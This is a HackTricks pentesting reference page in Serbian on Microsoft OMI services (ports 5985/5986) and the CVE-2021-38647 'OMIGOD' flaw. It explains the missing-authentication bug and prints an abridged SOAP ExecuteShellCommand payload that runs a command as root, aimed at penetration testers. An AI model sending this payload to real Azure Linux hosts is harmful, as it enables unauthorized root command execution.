hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md

# 5985,5986 - Pentesting OMI

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

### **Osnovne informacije**

**OMI** se predstavlja kao **[open-source](https://github.com/microsoft/omi)** alat od strane Microsoft-a, dizajniran za daljinsko upravljanje konfiguracijom. Posebno je relevantan za Linux servere na Azure-u koji koriste usluge kao što su:

- **Azure Automation**
- **Azure Automatic Update**
- **Azure Operations Management Suite**
- **Azure Log Analytics**
- **Azure Configuration Management**
- **Azure Diagnostics**

Proces `omiengine` se pokreće i sluša na svim interfejsima kao root kada su ove usluge aktivirane.

**Podrazumevani portovi** koji se koriste su **5985** (http) i **5986** (https).

### **[CVE-2021-38647 ranjivost](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)**

Kako je primećeno 16. septembra, Linux serveri raspoređeni u Azure-u sa pomenutim uslugama su podložni zbog ranjive verzije OMI. Ova ranjivost leži u načinu na koji OMI server obrađuje poruke kroz `/wsman` endpoint bez zahteva za Authentication header, pogrešno autorizujući klijenta.

Napadač može iskoristiti ovo slanjem "ExecuteShellCommand" SOAP payload-a bez Authentication header-a, primoravajući server da izvrši komande sa root privilegijama.
```xml
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
```
Za više informacija o ovom CVE **[proverite ovo](https://github.com/horizon3ai/CVE-2021-38647)**.

## Reference

* [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/)
* [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)

{% hint style="success" %}
Učite i vežbajte AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Učite i vežbajte GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Podržite HackTricks</summary>

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>
{% endhint %}